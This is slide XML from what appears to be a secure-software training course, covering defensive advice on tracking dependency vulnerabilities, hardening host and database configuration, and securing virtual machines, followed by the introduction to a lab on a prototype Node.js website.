                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A51013A-4FDC-42D4-9305-89CBF9854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40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AC577-582D-4E0C-8F8B-40A13178B1B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Keep Apprised of Vulnerabilities </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in Third-Party Code and Services</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D872E78C-44BF-486C-97BE-981ED3FB5135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for new vulnerabilities in third-party resources when you release a new build.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Monitor vulnerability databases for any dependencies your software uses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If possible:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Monitor the bug-tracking system for every library your software uses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify security-related defects that are not in the NVD or other vulnerability databases.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Subscribe to RSS feeds or mailing lists to be informed of new bugs as they're identified.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Know all of your software's direct and indirect dependencies, and stay apprised of their vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Know the potential vulnerabilities of languages and development tools you use, and make sure you implement appropriate protections and workarounds.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If possible:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Include dependency checks into your build process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use a tool such as the free OWASP Dependency-Check project to quickly compile a list of dependencies and identify those with known vulnerabilities and exploits.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/OWASP_Dependency_Check</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(When this course was written, this tool primarily supported Java and .NET.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{961A6176-DFB1-4760-9427-AB96DA40D9E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2672CE9D-6F42-4975-AD1D-3C2AAF2CC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1969-3852-4A78-B7B8-C2A206568414}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host Platform Configuration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F04FFD30-6C06-4F8A-B79A-EDF887C4A399}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web- and cloud-based applications rely on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>host platform or service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to run. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples: web, database, application, storage, messaging, directory services, search.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not a direct part of your application, but contribute to the security posture.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If improperly configured, can lead to a wide variety of security problems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System operators responsible for these services:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May not be in the same group as those developing applications that run on them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Must work closely with developers to ensure secure configuration and maintenance.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04FA6BE2-31FF-4C7B-920B-FEC24B60F751}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="309976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6D5A-369B-470C-B0B7-7C6E54ABD06D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hypervisor Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{158D7B31-3ADC-4BFF-9F5B-2B4D552A0E60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341924" y="1307130"/>
            <a:ext cx="6287476" cy="4935408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many modern applications, particularly those running on cloud platforms, are designed to run on virtual machines (VMs).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>VM environments are considered by some to be more secure than traditional physical machine environments because VMs:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Are logically isolated from each other.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Are transient, popping in and out of existence to perform specific short-lived tasks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be taken off-line and replaced quickly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attack on VMs might focus on the hypervisor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In practice, few hypervisor exploits have been identified.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The VM image could be compromised by an attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Running VMs are subject to many of the same vulnerabilities as a traditional physical machine environment, so many of the security strategies used for physical machines apply to virtual machines.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51CC07CC-BE15-4D4B-9598-E2E2D15FE784}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Image result for virtual machine png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12827083-D1AA-4720-A5EF-6B70E2804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151" y="2438400"/>
            <a:ext cx="2598392" cy="181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12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CF1F-8F69-4808-B6E3-CF4A1F5B637B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent Configuration Vulnerabilities (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0C8A256-B355-4F7B-B56C-3ABDC85DCA97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Review all switches and configuration settings to ensure the safest possible configuration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remove or disable all unnecessary features: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Services, accounts, privileges, ports, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change default passwords for pre-configured accounts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Define a repeatable (preferably automated) process to quickly and easily provision and harden the configuration of a new deployment environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configure development, testing, and production environments the same way, but with different passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Define and adhere to a process for monitoring and patching vulnerabilities of all services and components in each deployed environment, and performing timely updates.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Design a strong application architecture that securely separates components to minimize security problems across component boundaries in the event a misconfiguration should appear at any time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run scans and perform audits periodically (automatically, if possible) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to help detect future misconfigurations or missing patches.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C100A847-AD4E-47AB-8744-D7BD6DB7A480}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{931EFD18-78FF-4D91-8623-30AFC2EFF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452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F6FE1-8B2A-44D5-8FFE-B3E8EEEF2D1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</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E00F9B2A-59D7-4767-BC3C-27126A424DF3}"/>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4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25E1A17D-631E-4080-B3EA-5A4225F75B20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722313" y="4406900"/>
            <a:ext cx="7772400" cy="1828437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Handle Vulnerabilities Due to Software Defects and Misconfiguration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3882180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CF1F-8F69-4808-B6E3-CF4A1F5B637B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent Configuration Vulnerabilities (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0C8A256-B355-4F7B-B56C-3ABDC85DCA97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the most secure configuration for database connection strings. Use trusted connections, and do not use cleartext passwords. If possible, use a password hash instead of cleartext credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configure network transmissions to use secure encryption. Use SSL, SSH, and other forms of encryption (such as encrypted database connections) to prevent data from being intercepted or interfered with over the wire.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configure data storage to use secure encryption. Encrypt file, object, and database storage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some information security policies and standards require the database on-disk data to be encrypted. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, this is essentially useless if the database connection allows clear text access to the data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configure passwords to be stored only in a non-reversible format.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If possible, configure services to not store sensitive data such as PII and credit cards at all.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C100A847-AD4E-47AB-8744-D7BD6DB7A480}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9E56945-B781-4D8C-BE87-C7EAD4F0E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97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CF1F-8F69-4808-B6E3-CF4A1F5B637B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent Vulnerabilities in Virtual Machine Infrastructure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0C8A256-B355-4F7B-B56C-3ABDC85DCA97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure that a patch management system is in place. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide the minimum access needed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log and review user and system activities in the virtual environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pay special attention to how you configure virtual networking devices.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consistently capture snapshots.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Carefully monitor the number of virtual machines to avoid VM sprawl.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect against VM escape.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C100A847-AD4E-47AB-8744-D7BD6DB7A480}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8230DF03-5F8E-484C-B744-EDB94A1CF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4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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Another developer has started prototyping the Woodworker's Wheelhouse website using Node.js.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You will explore the design of the web application and start identifying what needs to be changed to improve security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You will start by accessing the site's functionality as a user, to get a sense of how it functions and how it's put together, much like an attacker would do. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
